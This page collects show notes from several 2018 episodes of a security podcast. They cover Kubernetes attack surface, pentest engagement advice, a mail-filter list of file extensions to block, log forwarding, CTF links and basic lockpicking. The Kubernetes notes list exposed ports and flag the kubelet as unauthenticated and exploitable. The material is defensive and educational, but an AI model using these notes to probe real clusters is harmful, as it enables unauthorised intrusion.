#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: December 3, 20182018-041: part 2 of Kubernetes security insights w/ ian Coldwater
@IanColdwater https://www.redteamsecure.com/ *new gig*
So many different moving parts
Plugins
Code
Hardware
She’s working on speaking schedule for 2019
How would I use these at home?
https://kubernetes.io/docs/setup/minikube/
Kubernetes - up and running
https://www.amazon.com/Kubernetes-Running-Dive-Future-Infrastructure/dp/1491935677
General wikipedia article (with architecture diagram): https://en.wikipedia.org/wiki/Kubernetes
https://twitter.com/alicegoldfuss - Alice Goldfuss
Derbycon Talk: http://www.irongeek.com/i.php?page=videos/derbycon8/track-3-10-perfect-storm-taking-the-helm-of-kubernetes-ian-coldwater
Tesla mis-configured Kubes env:
From the talk: https://arstechnica.com/information-technology/2018/02/tesla-cloud-resources-are-hacked-to-run-cryptocurrency-mining-malware/
Redlock report mentioned in Ars article: https://redlock.io/blog/cryptojacking-tesla
Setup your own K8s environment: https://kubernetes.io/docs/setup/pick-right-solution/#local-machine-solutions (many options to choose from)
Securing K8s implementations: https://kubernetes.io/docs/tasks/administer-cluster/securing-a-cluster/
https://github.com/aquasecurity/kube-hunter -
Threat Model
What R U protecting?
Who R U protecting from?
What R your Adversary’s capabilities?
What R your capabilities?
Defenders think in Lists
Attackers think in Graphs
What are some of the visible ports used in K8S?
44134/tcp - Helmtiller, weave, calico
10250/tcp - kubelet (kublet exploit)
No authN, completely open
10255/tcp - kublet port (read-only)
4194/tcp - cAdvisor
2379/tcp - etcd
Etcd holds all the configs
Config storage
Engineering workflow:
Ephemeral -
CVE for K8S subpath - https://kubernetes.io/blog/2018/04/04/fixing-subpath-volume-vulnerability/
Final points:
Advice securing K8S is standard security advice
Use Defense in Depth, and least Privilege
Be aware of your attack surface
Keep your threat model in mind
David Cybuck (questions from Slack channel)
My questions are: 1. Talk telemetry? What is the best first step for having my containers or kubernetes report information? (my overlords want metrics dashboards which lead to useful metrics).
- How do you threat model your containers? Has she ever or how would she begin to run a table-top exercise, a cross between a threat model and a disaster recovery walk through, for the container infrastructure?
- Mitre Att&ck framework, there is a spin off for mobile. Do we need one for Kube, swarm, or DC/OS?
2018-040- Jarrod Frates discusses pentest processes
Jarrod Frates
Inguardians
@jarrodfrates
“Skittering Through Networks”
Ms. Berlin in Germany - How’d it go?
TinkerSec’s story: https://threadreaderapp.com/thread/1063423110513418240.html
Takeaways
Blue Team:
- Least Privilege Model
- Least Access Model
“limited remote access to only a small number of IT personnel”
“This user didn't need Citrix, so her Citrix linked to NOTHING”
“They limited access EVEN TO LOCAL ADMINS!”
- Multi-Factor Authentication
- Simple Anomaly Rule Fires
“Finance doesn’t use Powershell”
- Defense in Depth
“moving from passwords to pass phrases…”
“Improper disposal of information assets”
Red Team:
- Keep Trying
- Never Assume
- Bring In Help
- Luck Favors the Prepared
- Adapt and Overcome
Before the Test
- Talk it over with stakeholders: Reasons, goals, schedules
- Report is the product: Get samples
- Who, what, when, where, why, how
- Talk to testers (and clients, if you can find them)
-
- Ask questions
- Look for past defensive experience and understanding of your needs
-
- Bonus points if they interview you as a client
- Red flags: Pwning is all they talk about, they set no-crash guarantees, send info in the clear
- Define the scope: Test type(s), inclusions, exclusions, permissions, accounts
- Test in ‘test/dev’, NOT PROD
- Social Engineering: DO THIS. Yes, you’re vulnerable. DO IT ANYWAY.
During the Test
- Comms: Keep in contact with the testers
-
- Status reports (if the engagement is long enough)
- Have an established method for escalation
- Have an open communication style --brbr (WeBrBrs)
- Ask questions, but let the testers do their jobs
- Be available and ready to address critical events
- Keep critical stakeholders informed
- Watch your network: things break, someone else may be getting in, capture packets(?)
After the Test
- Getting Results:
-
- Report delivered securely
- Initial summary: How far did they get?
- Actual report
-
- Written for multiple levels
- No obvious copy/paste
- Read, understand, provide feedback, and get revised version
- Next steps:
-
- Don’t blame anyone unnecessarily
- Start planning with stakeholders on fixes
- Contact vendors, educate staff
- Reacting to report
- Sabotaging your test
- Future testing
Ms. Berlin’s Legit business - Mental Health Hackers
CFP for Bsides Seattle (Deadline: 26 November 2018) http://www.securitybsides.com/w/page/129078930/BsidesSeattle2019
CFP for BsidesNash https://twitter.com/bsidesnash/status/1063084215749787649 Closes Dec 31
Teaching a class in Seattle for SANS (SEC504) - need some students! Reach out to me for more information. Looking to do this at the end of February through March
heck out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: November 19, 20182018-039-Ian Coldwater, kubernetes, container security
Ian Coldwater-
@IanColdwater https://www.redteamsecure.com/ *new gig*
So many different moving parts
Plugins
Code
Hardware
She’s working on speaking schedule for 2019
How would I use these at home?
https://kubernetes.io/docs/setup/minikube/
Kubernetes - up and running
https://www.amazon.com/Kubernetes-Running-Dive-Future-Infrastructure/dp/1491935677
General wikipedia article (with architecture diagram): https://en.wikipedia.org/wiki/Kubernetes
https://twitter.com/alicegoldfuss - Alice Goldfuss
Derbycon Talk: http://www.irongeek.com/i.php?page=videos/derbycon8/track-3-10-perfect-storm-taking-the-helm-of-kubernetes-ian-coldwater
Tesla mis-configured Kubes env:
From the talk: https://arstechnica.com/information-technology/2018/02/tesla-cloud-resources-are-hacked-to-run-cryptocurrency-mining-malware/
Redlock report mentioned in Ars article: https://redlock.io/blog/cryptojacking-tesla
Setup your own K8s environment: https://kubernetes.io/docs/setup/pick-right-solution/#local-machine-solutions (many options to choose from)
Securing K8s implementations: https://kubernetes.io/docs/tasks/administer-cluster/securing-a-cluster/
https://github.com/aquasecurity/kube-hunter -
Threat Model
What R U protecting?
Who R U protecting from?
What R your Adversary’s capabilities?
What R your capabilities?
Defenders think in Lists
Attackers think in Graphs
What are some of the visible ports used in K8S?
44134/tcp - Helmtiller, weave, calico
10250/tcp - kubelet (kublet exploit)
No authN, completely open
10255/tcp - kublet port (read-only)
4194/tcp - cAdvisor
2379/tcp - etcd
Etcd holds all the configs
Config storage
Engineering workflow:
Ephemeral -
CVE for K8S subpath - https://kubernetes.io/blog/2018/04/04/fixing-subpath-volume-vulnerability/
Final points:
Advice securing K8S is standard security advice
Use Defense in Depth, and least Privilege
Be aware of your attack surface
Keep your threat model in mind
David Cybuck (questions from Slack channel)
My questions are: 1. Talk telemetry? What is the best first step for having my containers or kubernetes report information? (my overlords want metrics dashboards which lead to useful metrics).
- How do you threat model your containers? Has she ever or how would she begin to run a table-top exercise, a cross between a threat model and a disaster recovery walk through, for the container infrastructure?
- Mitre Att&ck framework, there is a spin off for mobile. Do we need one for Kube, swarm, or DC/OS?
heck out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: November 12, 20182018-038-InfosecSherpa, security culture,
@InfoSecSherpa
I have two talks coming up:
- Empathy as a Service to Create a Culture of Security at the Cofense Submerge conference
- Deep Dive into Social Media as an OSINT Tool at the H-ISAC Fall Summit (Health Information Sharing and Analysis Center)
*Shameless Plug* My Nuzzel newsletters
https://nuzzel.com/InfoSecSherpa
https://nuzzel.com/InfoSecSherpa/cybersecurity-africa
News stories -
Biglaw Firm Hit With Cybersecurity Incident Earlier This Month (Published: 29 October 2018 | Source: Above the Law)
Porn-Watching Employee Infected Government Networks With Russian Malware, IG Says (Published: 25 October 2018 | Source: Next Gov)
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: November 5, 20182018-037-iWatch save man's life, Alexa detects your mood, and post-derby discussion
Health & Tech?
https://hackaday.io/project/151388-minder (774 results for “health” on hackaday)
(def don’t need to talk about, but still funny AF) https://hackaday.io/project/11407-myflow
https://9to5mac.com/2017/12/15/apple-watch-saves-life-managing-heart-attack/
Privacy implications?
Microsoft healthcare initiative - https://enterprise.microsoft.com/en-us/industries/health/
Apple health - https://www.apple.com/ios/health/ - https://www.apple.com/researchkit/
https://www.papercall.io/dachfest18
Make plans for next year! Follow @derbycon on Twitter!
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: October 22, 20182018-036-Derbycon 2018 Audio with Cheryl Biswas and Tomasz Tula
Derbycon is probably one of the best infosec conferences of the calendar year. The podcast always has so much fun meeting listeners, meeting new people, and getting some audio to share with folks who can't be there.
This year, we still got some audio, and it's great. We talked with Cheryl Biswas (@3ncr1pt3d) with her talks at #Derbycon and her work with the #dianaInitiative Check out her talks at the links on @irongeek's website...
Cheryl's Track talk: http://www.irongeek.com/i.php?page=videos/derbycon8/track-1-05-draw-a-bigger-circle-infosec-evolves-cheryl-biswas
Cheryl's Stable talk: http://www.irongeek.com/i.php?page=videos/derbycon8/stable-29-patching-show-me-where-it-hurts-cheryl-biswas
I saw Tomasz near the @log-md booth, it was his first Derbycon, and I was interested in hearing what he had to say about hypervisor introspection...
Make plans for next year! Follow @derbycon on Twitter!
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: October 15, 20182018-035-software bloat is forever; malicious file extensions; WMIC abuses
Pizza Party Link -
https://www.eventbrite.com/e/brakesec-derbycon-pizza-meetup-tickets-50719385046
News stories-
Software/library bloat
http://tonsky.me/blog/disenchantment/
https://hackernoon.com/how-it-feels-to-learn-javascript-in-2016-d3a717dd577f
https://hackerhurricane.blogspot.com/2016/09/avoiding-ransomware-with-built-in-basic.html
https://www.zdnet.com/article/windows-utility-used-by-malware-in-new-information-theft-campaigns/
https://attack.mitre.org/wiki/Technique/T1170 - HTA file malware examples
https://nakedsecurity.sophos.com/2018/09/26/finally-a-fix-for-the-encrypted-webs-achilles-heel/
https://www.bbc.com/news/technology-45686890 -
(facebook account hack)
https://github.com/eset/malware-ioc/blob/master/sednit/lojax.adoc IOC’s from various malware
UEFI rootkit - https://www.bleepingcomputer.com/news/security/apt28-uses-lojax-first-uefi-rootkit-seen-in-the-wild/
Block These Extensions:
File Extension File Type
.adp Access Project (Microsoft)
.app Executable Application
.asp Active Server Page
.bas BASIC Source Code
.bat Batch Processing
.cer Internet Security Certificate File
.chm Compiled HTML Help
.cmd DOS CP/M Command File, Command File for Windows NT
.cnt Help file index
.com Command
.cpl Windows Control Panel Extension(Microsoft)
.crt Certificate File
.csh csh Script
.der DER Encoded X509 Certificate File
.exe Executable File
.fxp FoxPro Compiled Source (Microsoft)
.gadget Windows Vista gadget
.hlp Windows Help File
.hpj Project file used to create Windows Help File
.hta Hypertext Application
.inf Information or Setup File
.ins IIS Internet Communications Settings (Microsoft)
.isp IIS Internet Service Provider Settings (Microsoft)
.its Internet Document Set, Internet Translation
.js JavaScript Source Code
.jse JScript Encoded Script File
.ksh UNIX Shell Script
.lnk Windows Shortcut File
.mad Access Module Shortcut (Microsoft)
.maf Access (Microsoft)
.mag Access Diagram Shortcut (Microsoft)
.mam Access Macro Shortcut (Microsoft)
.maq Access Query Shortcut (Microsoft)
.mar Access Report Shortcut (Microsoft)
.mas Access Stored Procedures (Microsoft)
.mat Access Table Shortcut (Microsoft)
.mau Media Attachment Unit
.mav Access View Shortcut (Microsoft)
.maw Access Data Access Page (Microsoft)
.mda Access Add-in (Microsoft), MDA Access 2 Workgroup (Microsoft)
.mdb Access Application (Microsoft), MDB Access Database (Microsoft)
.mde Access MDE Database File (Microsoft)
.mdt Access Add-in Data (Microsoft)
.mdw Access Workgroup Information (Microsoft)
.mdz Access Wizard Template (Microsoft)
.msc Microsoft Management Console Snap-in Control File (Microsoft)
.msh Microsoft Shell
.msh1 Microsoft Shell
.msh2 Microsoft Shell
.mshxml Microsoft Shell
.msh1xml Microsoft Shell
.msh2xml Microsoft Shell
.msi Windows Installer File (Microsoft)
.msp Windows Installer Update
.mst Windows SDK Setup Transform Script
.ops Office Profile Settings File
.osd Application virtualized with Microsoft SoftGrid Sequencer
.pcd Visual Test (Microsoft)
.pif Windows Program Information File (Microsoft)
.plg Developer Studio Build Log
.prf Windows System File
.prg Program File
.pst MS Exchange Address Book File, Outlook Personal Folder File (Microsoft)
.reg Registration Information/Key for W95/98, Registry Data File
.scf Windows Explorer Command
.scr Windows Screen Saver
.sct Windows Script Component, Foxpro Screen (Microsoft)
.shb Windows Shortcut into a Document
.shs Shell Scrap Object File
.ps1 Windows PowerShell
.ps1xml Windows PowerShell
.ps2 Windows PowerShell
.ps2xml Windows PowerShell
.psc1 Windows PowerShell
.psc2 Windows PowerShell
.tmp Temporary File/Folder
.url Internet Location
.vb VBScript File or Any VisualBasic Source
.vbe VBScript Encoded Script File
.vbp Visual Basic project file
.vbs VBScript Script File, Visual Basic for Applications Script
.vsmacros Visual Studio .NET Binary-based Macro Project (Microsoft)
.vsw Visio Workspace File (Microsoft)
.ws Windows Script File
.wsc Windows Script Component
.wsf Windows Script File
.wsh Windows Script Host Settings File
.xnk Exchange Public Folder Shortcut
.ade ADC Audio File
.cla Java class File
.class Java class File
.grp Microsoft Widows Program Group
.jar Compressed archive file package for Java classes and data
.mcf MMS Composer File
.ocx ActiveX Control file
.pl Perl script language source code
.xbap Silverlight Application Package
------------------------------
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: October 1, 20182018-034-Pentester_Scenario
Interesting email from one of our listeners. Detailing an issue that came up on a client engagement. We walk through best ways to store information post-engagement, and what you need to do to document test procedures so you don't get bit by a potential issue perhaps months down the line.
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: September 25, 2018
2018-031-Derbycon ticket CTF, Windows Event forwarding, SIEM collection, and missing events... oh my!
We are back with a new episode this week! We got over our solutions for some of the #derbyCon ticket #CTF challenges and include links to some of the challenges. We talk about Windows Event Forwarder, and all log forwarders seem to losing events!
Thanks to our Patrons!
Gonna be at Derbycon, come see us!
Congrats to our Derbycon Ticket CTF winners!
Winner: @gigstaggart
2nd Place: @ohai_ninja
3rd Place: @SoDakHib
Mr. Boettcher’s Challenge (SuperCrypto): https://drive.google.com/open?id=1657hBxRbacJRw0svG1nwzZImON3QFn1t
Ms.Berlin’s Challenge:
potato.file https://drive.google.com/open?id=1Mit7060ipK_JgDDF7sYG3XbMpZ9wyaFN
Taters.zip https://drive.google.com/open?id=1TnA16EiwLw2BberHXct8JpEsntT-GWq7
Potatoes.pcapng: https://drive.google.com/open?id=1_IATBw4OGAc7lUc7NXTcucfwU9NAROYN
Mr. Brake’s Challenge: https://drive.google.com/open?id=1gwGkLjWEZ42NlWiw2Eg8IQnnQAxua7B8
Update on Mental Health GoFundMe: http://www.derbycon.com/wellness
Thanks to the #Derbycon organizers for their time and patience on answering the questions posed.
Missing event issues:
https://github.com/palantir/windows-event-forwarding
https://answers.splunk.com/answers/337939/how-to-troubleshoot-why-im-missing-events-in-my-se.html
https://www.solarwinds.com/free-tools/event-log-forwarder-for-windows
https://hackernoon.com/the-windows-event-forwarding-survival-guide-2010db7a68c4
https://4sysops.com/archives/windows-event-forwarding-to-a-sql-database/
https://blogs.technet.microsoft.com/jepayne/2017/12/08/weffles/
http://bpatty.rocks/blue_team/weffles.html
Some issues with missing events… Everyone is affected by this!
WEF & PowerBI is good for small installations.
Any GPOs involved?
Can it be done on a server by server basis?
Can an attacker simply disable the service once initial access is achieved?
Pros and Cons of feeding the WEF output to a MapReduce system?
Not sure if they've used it, but WEF vs. winlogbeat vs. NxLog?
Need a config? Get some examples here for nxlog, winlogbeat, filebeat, Windows Logging Service and other stuff...
https://www.malwarearchaeology.com/logging/
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: September 1, 20182018-030: Derbycon CTF and Auction info, T-mobile breach suckage, and lockpicking
CTF information:
Official site: https://scoreboard.totallylegitsite.com (thanks Matt Domko (@hashtagcyber) for hosting and allowing us to use his employee discount!)
Please do not pentest the environment, not DDoS, nor cause anything undesirable to happen to the site.
View the page, submit the flags, leave everything else alone...
Derbycon Auction - starts September 8th at 9am Pacific Time
Slack only -
Opening bid is $175
Increments of $25 only
100% goes to Chris Sanders’ “Rural Technology Fund”
https://ruraltechfund.org/donate/
Amanda’s mental health workshop - AWESOME! http://www.derbycon.com/wellness/
https://www.gofundme.com/derbycon-mental-health-amp-wellbeing
Mandy Logan - hacking her way out of a coma! https://www.gofundme.com/hacking-recovery-brainstem-stroke
https://www.tomsguide.com/us/tmobile-breach-2018,news-27876.html
https://art-of-lockpicking.com/single-pin-picking-skills/
Lockpicking - Mr. Boettcher discusses (I have thoughts too --brbr)
Tools:
- Tension Wrench
- Picks
Parts of lock:
- Cylinder
- Driver Pins
- Key Pins
- Springs
Sites:
- https://toool.us/
- https://art-of-lockpicking.com/how-to-pick-a-lock-guide/ - This is a good guide if you can get past the ADs
Mr. Boettcher introducing JGOR audio (@indiecom) totally not @jwgoerlich
Btw: https://www.flickr.com/photos/36152409@N00/sets/72157700237001915/
https://www.trustedsec.com/2018/08/tech-support-scams-are-a-concern-for-all/
https://twitter.com/InfoSystir/status/1032343381328973827
#Brakesec Store!:https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: August 26, 20182018-029-postsummercamp-future_record_breached-vulns_nofix
Post-Hacker Summercamp
IppSec Walkthroughs
Brakesec Derbycon ticket CTF -
Drama - (hotel room search gate)
AirconditionerGate
Personal privacy
Ask for ID
Call the front desk
Use the deadbolt - can be bypassed
Plug the peephole with TP
Hotel rooms aren’t secure (neither are the safes)
Probably the most hostile environment infosec people go into to try and be secure/private
- This is the company behind a sort-of threat intel site (vulnDB)
- The original marketing site
-
- I figured it was marketing… it smacked of a ‘buy our product’ site\, but we don’t have to mention vulnDB
https://www.informationsecuritybuzz.com/expert-comments/over-146-billion-records/
Based on study by Juniper Research
https://www.teepublic.com/user/bdspodcast
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: August 17, 20182018-028-runkeys, DNS Logging, derbycon Talks
HTTPS on www.brakeingsecurity.com, Libsyn RSS syncing of itunes/google Play is over TLS
Amanda giving a talk at Diana Initiative
Derbycon Talk - mental health
Volunteer/Topic request form - https://goo.gl/forms/wAiLW5Dh5h0MR5bO2
http://www.hexacorn.com/blog/2018/07/29/beyond-good-ol-run-key-part-82/
https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/tracelo
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: August 9, 2018
2018-027-Godfrey Daniels talks about his book about the Mojave Phonebooth
Godfrey Daniels - author of "Adventures with the Mojave Phone Booth" on sale at mojavephoneboothbook.com
https://en.wikipedia.org/wiki/Mojave_phone_booth
https://www.tripsavvy.com/the-mojave-phone-booth-1474047
https://www.dailydot.com/debug/mojave-phone-booth-back-number/
https://www.npr.org/2014/08/22/342430204/the-mojave-phone-booth
https://twitter.com/mojavefonebooth
https://www.theatlantic.com/technology/archive/2017/02/object-lesson-phone-booth/515385/
http://deathvalleyjim.com/cima-cinder-mine-mojave-national-preserve/
https://twitter.com/_noid_?lang=en
http://www.mojavephonebooth.com/ - movie based on the phone booth itself, not the book
#Spotify: https://brakesec.com/spotifyBDS
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
